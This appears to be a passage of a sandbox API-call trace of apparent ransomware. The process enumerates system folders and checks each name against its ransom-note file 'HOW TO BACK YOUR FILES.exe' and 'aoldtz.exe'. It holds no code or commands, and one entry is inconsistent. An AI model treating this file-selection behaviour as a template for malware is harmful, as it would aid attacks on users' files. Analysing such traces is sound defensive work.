lstrcpyW (in: lpString1=0x2cce45c, lpString2="Assistance" | out: lpString1="Assistance") returned="Assistance" [0090.114] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0090.114] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1608 [0090.114] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0090.115] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c84ada0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c84ada0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0090.115] lstrcmpiW (lpString1="Crypto", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.115] lstrcmpiW (lpString1="Crypto", lpString2="aoldtz.exe") returned 1 [0090.115] lstrcpyW (in: lpString1=0x2cce45c, lpString2="Crypto" | out: lpString1="Crypto") returned="Crypto" [0090.115] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0090.115] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6a) returned 0x2d2f68 [0090.115] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0090.115] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Device Stage", cAlternateFileName="DEVICE~1")) returned 1 [0090.115] lstrcmpiW (lpString1="Device Stage", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.115] lstrcmpiW (lpString1="Device Stage", lpString2="aoldtz.exe") returned 1 [0090.115] lstrcpyW (in: lpString1=0x2cce45c, lpString2="Device Stage" | out: lpString1="Device Stage") returned="Device Stage" [0090.115] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0090.115] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x76) returned 0x2c1408 [0090.115] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0090.115] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DeviceSync", cAlternateFileName="DEVICE~2")) returned 1 [0090.117] lstrcmpiW (lpString1="DeviceSync", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.117] lstrcmpiW (lpString1="DeviceSync", lpString2="aoldtz.exe") returned 1 [0090.117] lstrcpyW (in: lpString1=0x2cce45c, lpString2="DeviceSync" | out: lpString1="DeviceSync") returned="DeviceSync" [0090.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0090.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1708 [0090.117] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0090.117] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c71a2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DRM", cAlternateFileName="")) returned 1 [0090.117] lstrcmpiW (lpString1="DRM", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.117] lstrcmpiW (lpString1="DRM", lpString2="aoldtz.exe") returned 1 [0090.117] lstrcpyW (in: lpString1=0x2cce45c, lpString2="DRM" | out: lpString1="DRM") returned="DRM" [0090.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0090.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x64) returned 0x2e4710 [0090.117] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0090.117] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x4c6f4140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6f4140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eHome", cAlternateFileName="")) returned 1 [0090.117] lstrcmpiW (lpString1="eHome", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.117] lstrcmpiW (lpString1="eHome", lpString2="aoldtz.exe") returned 1 [0090.117] lstrcpyW (in: lpString1=0x2cce45c, lpString2="eHome" | out: lpString1="eHome") returned="eHome" [0090.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0090.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x68) returned 0x2e4780 [0090.117] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0090.117] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6cdfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Event Viewer", cAlternateFileName="EVENTV~1")) returned 1 [0090.117] lstrcmpiW (lpString1="Event Viewer", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.118] lstrcmpiW (lpString1="Event Viewer", lpString2="aoldtz.exe") returned 1 [0090.118] lstrcpyW (in: lpString1=0x2cce45c, lpString2="Event Viewer" | out: lpString1="Event Viewer") returned="Event Viewer" [0090.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0090.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x76) returned 0x2c1788 [0090.118] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0090.118] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c315d80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c315d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.118] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.118] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66a32400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x66a32400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IdentityCRL", cAlternateFileName="IDENTI~1")) returned 1 [0090.118] lstrcmpiW (lpString1="IdentityCRL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.118] lstrcmpiW (lpString1="IdentityCRL", lpString2="aoldtz.exe") returned 1 [0090.118] lstrcpyW (in: lpString1=0x2cce45c, lpString2="IdentityCRL" | out: lpString1="IdentityCRL") returned="IdentityCRL" [0090.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0090.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x74) returned 0x2c1808 [0090.118] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0090.118] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c65bbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0090.118] lstrcmpiW (lpString1="Media Player", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.118] lstrcmpiW (lpString1="Media Player", lpString2="aoldtz.exe") returned 1 [0090.118] lstrcpyW (in: lpString1=0x2cce45c, lpString2="Media Player" | out: lpString1="Media Player") returned="Media Player" [0090.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7808 [0090.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x76) returned 0x2c1688 [0090.118] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7810 | out: ListHead=0x2e7710, ListEntry=0x2e7810) returned 0x2e7c30 [0090.118] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x669bffe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x669bffe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MF", cAlternateFileName="")) returned 1 [0090.118] lstrcmpiW (lpString1="MF", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.118] lstrcmpiW (lpString1="MF", lpString2="aoldtz.exe") returned 1 [0090.118] lstrcpyW (in: lpString1=0x2cce45c, lpString2="MF" | out: lpString1="MF") returned="MF" [0090.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e77c8 [0090.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x62) returned 0x2e47f0 [0090.119] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e77d0 | out: ListHead=0x2e7710, ListEntry=0x2e77d0) returned 0x2e7810 [0090.119] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSDN", cAlternateFileName="")) returned 1 [0090.119] lstrcmpiW (lpString1="MSDN", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.119] lstrcmpiW (lpString1="MSDN", lpString2="aoldtz.exe") returned 1 [0090.119] lstrcpyW (in: lpString1=0x2cce45c, lpString2="MSDN" | out: lpString1="MSDN") returned="MSDN" [0090.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7788 [0090.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x66) returned 0x2e4860 [0090.119] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7790 | out: ListHead=0x2e7710, ListEntry=0x2e7790) returned 0x2e77d0 [0090.119] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetFramework", cAlternateFileName="NETFRA~1")) returned 1 [0090.119] lstrcmpiW (lpString1="NetFramework", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.119] lstrcmpiW (lpString1="NetFramework", lpString2="aoldtz.exe") returned 1 [0090.119] lstrcpyW (in: lpString1=0x2cce45c, lpString2="NetFramework" | out: lpString1="NetFramework") returned="NetFramework" [0090.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0090.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x76) returned 0x2c1888 [0090.119] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79f0 | out: ListHead=0x2e7710, ListEntry=0x2e79f0) returned 0x2e7790 [0090.119] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c60f900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c60f900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0090.119] lstrcmpiW (lpString1="Network", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.119] lstrcmpiW (lpString1="Network", lpString2="aoldtz.exe") returned 1 [0090.119] lstrcpyW (in: lpString1=0x2cce45c, lpString2="Network" | out: lpString1="Network") returned="Network" [0090.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0090.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6c) returned 0x2d2fe0 [0090.119] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0090.119] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x64b40600, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x64b40600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OFFICE", cAlternateFileName="")) returned 1 [0090.119] lstrcmpiW (lpString1="OFFICE", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.119] lstrcmpiW (lpString1="OFFICE", lpString2="aoldtz.exe") returned 1 [0090.119] lstrcpyW (in: lpString1=0x2cce45c, lpString2="OFFICE" | out: lpString1="OFFICE") returned="OFFICE" [0090.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0090.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6a) returned 0x2d3058 [0090.120] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a30 | out: ListHead=0x2e7710, ListEntry=0x2e7a30) returned 0x2e7a10 [0090.120] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64762240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x64762240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0090.120] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.120] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="aoldtz.exe") returned 1 [0090.120] lstrcpyW (in: lpString1=0x2cce45c, lpString2="OfficeSoftwareProtectionPlatform" | out: lpString1="OfficeSoftwareProtectionPlatform") returned="OfficeSoftwareProtectionPlatform" [0090.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a48 [0090.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9e) returned 0x2d7700 [0090.120] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a50 | out: ListHead=0x2e7710, ListEntry=0x2e7a50) returned 0x2e7a30 [0090.120] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c577380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RAC", cAlternateFileName="")) returned 1 [0090.120] lstrcmpiW (lpString1="RAC", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.120] lstrcmpiW (lpString1="RAC", lpString2="aoldtz.exe") returned 1 [0090.120] lstrcpyW (in: lpString1=0x2cce45c, lpString2="RAC" | out: lpString1="RAC") returned="RAC" [0090.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a68 [0090.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x64) returned 0x2e48d0 [0090.120] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a70 | out: ListHead=0x2e7710, ListEntry=0x2e7a70) returned 0x2e7a50 [0090.120] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4c551220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c551220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1 [0090.120] lstrcmpiW (lpString1="Search", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.120] lstrcmpiW (lpString1="Search", lpString2="aoldtz.exe") returned 1 [0090.120] lstrcpyW (in: lpString1=0x2cce45c, lpString2="Search" | out: lpString1="Search") returned="Search" [0090.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a88 [0090.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6a) returned 0x2d30d0 [0090.120] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a90 | out: ListHead=0x2e7710, ListEntry=0x2e7a90) returned 0x2e7a70 [0090.120] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x63ee73e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63ee73e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="User Account Pictures", cAlternateFileName="USERAC~1")) returned 1 [0090.120] lstrcmpiW (lpString1="User Account Pictures", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.120] lstrcmpiW (lpString1="User Account Pictures", lpString2="aoldtz.exe") returned 1 [0090.120] lstrcpyW (in: lpString1=0x2cce45c, lpString2="User Account Pictures" | out: lpString1="User Account Pictures") returned="User Account Pictures" [0090.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7cc8 [0090.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e95b0 [0090.121] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cd0 | out: ListHead=0x2e7710, ListEntry=0x2e7cd0) returned 0x2e7a90 [0090.121] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c52b0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vault", cAlternateFileName="")) returned 1 [0090.121] lstrcmpiW (lpString1="Vault", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.121] lstrcmpiW (lpString1="Vault", lpString2="aoldtz.exe") returned 1 [0090.121] lstrcpyW (in: lpString1=0x2cce45c, lpString2="Vault" | out: lpString1="Vault") returned="Vault" [0090.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c88 [0090.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x68) returned 0x2e4940 [0090.121] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c90 | out: ListHead=0x2e7710, ListEntry=0x2e7c90) returned 0x2e7cd0 [0090.121] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c52b0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VISIO", cAlternateFileName="")) returned 1 [0090.121] lstrcmpiW (lpString1="VISIO", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.121] lstrcmpiW (lpString1="VISIO", lpString2="aoldtz.exe") returned 1 [0090.121] lstrcpyW (in: lpString1=0x2cce45c, lpString2="VISIO" | out: lpString1="VISIO") returned="VISIO" [0090.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c68 [0090.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x68) returned 0x2e49b0 [0090.121] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c70 | out: ListHead=0x2e7710, ListEntry=0x2e7c70) returned 0x2e7c90 [0090.121] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x60ae73a0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x60ae73a0, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0090.121] lstrcmpiW (lpString1="Windows", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.121] lstrcmpiW (lpString1="Windows", lpString2="aoldtz.exe") returned 1 [0090.121] lstrcpyW (in: lpString1=0x2cce45c, lpString2="Windows Defender" | out: lpString1="Windows Defender") returned="Windows Defender" [0090.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c48 [0090.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f00d8 [0090.121] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c50 | out: ListHead=0x2e7710, ListEntry=0x2e7c50) returned 0x2e7c70 [0090.121] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c33bee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c33bee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0090.121] lstrcmpiW (lpString1="Windows NT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.121] lstrcmpiW (lpString1="Windows NT", lpString2="aoldtz.exe") returned 1 [0090.121] lstrcpyW (in: lpString1=0x2cce45c, lpString2="Windows NT" | out: lpString1="Windows NT") returned="Windows NT" 